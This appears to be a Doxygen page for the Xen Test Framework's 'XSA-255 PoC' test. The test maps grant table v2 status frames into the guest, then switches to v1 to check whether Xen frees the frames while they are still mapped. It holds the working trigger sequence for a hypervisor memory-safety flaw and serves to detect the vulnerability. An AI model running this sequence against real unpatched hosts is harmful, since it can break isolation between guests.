Xen Test Framework
main.c
Go to the documentation of this file.
1 
24 #include <xtf.h>
25 
26 const char test_title[] = "XSA-255 PoC";
27 
28 static uint8_t frame1[PAGE_SIZE] __page_aligned_bss;
29 
30 void test_main(void)
31 {
32  int rc = xtf_init_grant_table(2);
33 
34  if ( rc == -ENOENT )
35  return xtf_skip("Skip: Grant Table v2 not available\n");
36  if ( rc )
37  return xtf_error("Error initialising grant table: %d\n", rc);
38 
39  /* Retrieve the status frames from Xen. */
40  uint64_t status_frames[1] = {};
41  struct gnttab_get_status_frames gsf = {
42  .dom = DOMID_SELF,
43  .nr_frames = ARRAY_SIZE(status_frames),
44  .frame_list = status_frames,
45  };
46 
47  rc = hypercall_grant_table_op(GNTTABOP_get_status_frames, &gsf, 1);
48  if ( rc || gsf.status )
49  return xtf_error("Error: unable to obtain status frames: %d,%d\n",
50  rc, gsf.status);
51 
52  /* Remap frame1 to point at the first status frame. */
53  rc = hypercall_update_va_mapping(
54  _u(frame1), pte_from_gfn(status_frames[0], PF_SYM(AD, P)), UVMF_INVLPG);
55  if ( rc )
56  return xtf_error("Error: unable to map status frame: %d\n", rc);
57 
58  /* Switch back to Grant Table v1, implicitly freeing the status frames. */
59  struct gnttab_set_version version = { 1 };
60 
61  rc = hypercall_grant_table_op(GNTTABOP_set_version, &version, 1);
62  switch ( rc )
63  {
64  case 0:
65  return xtf_failure("Fail: Vulnerable to XSA-255\n");
66 
67  case -EBUSY:
68  /* Probably not vulnerable. Try to confirm. */
69  break;
70 
71  default:
72  return xtf_error("Error: Unexpected set_version result %d\n", rc);
73  }
74 
75  /* Unmap the status frame. */
76  rc = hypercall_update_va_mapping(_u(frame1), 0, UVMF_INVLPG);
77  if ( rc )
78  return xtf_error("Error unmapping status frame: %d\n", rc);
79 
80  /* Retry the switch back to Grant Table v1. */
81  rc = hypercall_grant_table_op(GNTTABOP_set_version, &version, 1);
82  if ( rc )
83  return xtf_error("Error setting gnttab version: %d\n", rc);
84 
85  xtf_success("Success: Not vulnerable to XSA-255\n");
86 }
87 
88 /*
89  * Local variables:
90  * mode: C
91  * c-file-style: "BSD"
92  * c-basic-offset: 4
93  * tab-width: 4
94  * indent-tabs-mode: nil
95  * End:
96  */
GNTTABOP_get_status_frames
#define GNTTABOP_get_status_frames
Definition: grant_table.h:316
hypercall_update_va_mapping
static long hypercall_update_va_mapping(unsigned long linear, uint64_t npte, enum XEN_UVMF flags)
Definition: hypercall.h:115
ARRAY_SIZE
#define ARRAY_SIZE(a)
Definition: lib.h:8
__page_aligned_bss
#define __page_aligned_bss
Definition: compiler.h:37
GNTTABOP_set_version
#define GNTTABOP_set_version
Definition: grant_table.h:304
_u
#define _u(v)
Express an arbitrary value v as unsigned long.
Definition: numbers.h:53
gnttab_get_status_frames::status
int16_t status
Definition: grant_table.h:322
pte_from_gfn
intpte_t pte_from_gfn(unsigned long gfn, uint64_t flags)
PF_SYM
#define PF_SYM(...)
Create pagetable entry flags based on mnemonics.
Definition: symbolic-const.h:108
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38
EBUSY
#define EBUSY
Definition: errno.h:29
xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:137
uint64_t
__UINT64_TYPE__ uint64_t
Definition: stdint.h:17
xtf_skip
void xtf_skip(const char *fmt,...)
Report a test skip.
Definition: report.c:66
ENOENT
#define ENOENT
Definition: errno.h:16
xtf_init_grant_table
int xtf_init_grant_table(unsigned int version)
Initialise XTF&#39;s grant infrastructure.
Definition: grant_table.c:21
test_title
const char test_title[]
The title of the test.
Definition: main.c:14
gnttab_get_status_frames::dom
domid_t dom
Definition: grant_table.h:320
PAGE_SIZE
#define PAGE_SIZE
Definition: page.h:11
xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80
hypercall_grant_table_op
static long hypercall_grant_table_op(unsigned int cmd, void *args, unsigned int count)
Definition: hypercall.h:131
frame1
static uint8_t frame1[PAGE_SIZE]
Definition: main.c:28
DOMID_SELF
#define DOMID_SELF
Definition: xen.h:70
uint8_t
__UINT8_TYPE__ uint8_t
Definition: stdint.h:14
gnttab_get_status_frames
Definition: grant_table.h:317
gnttab_set_version
Definition: grant_table.h:305
Generated by   doxygen 1.8.13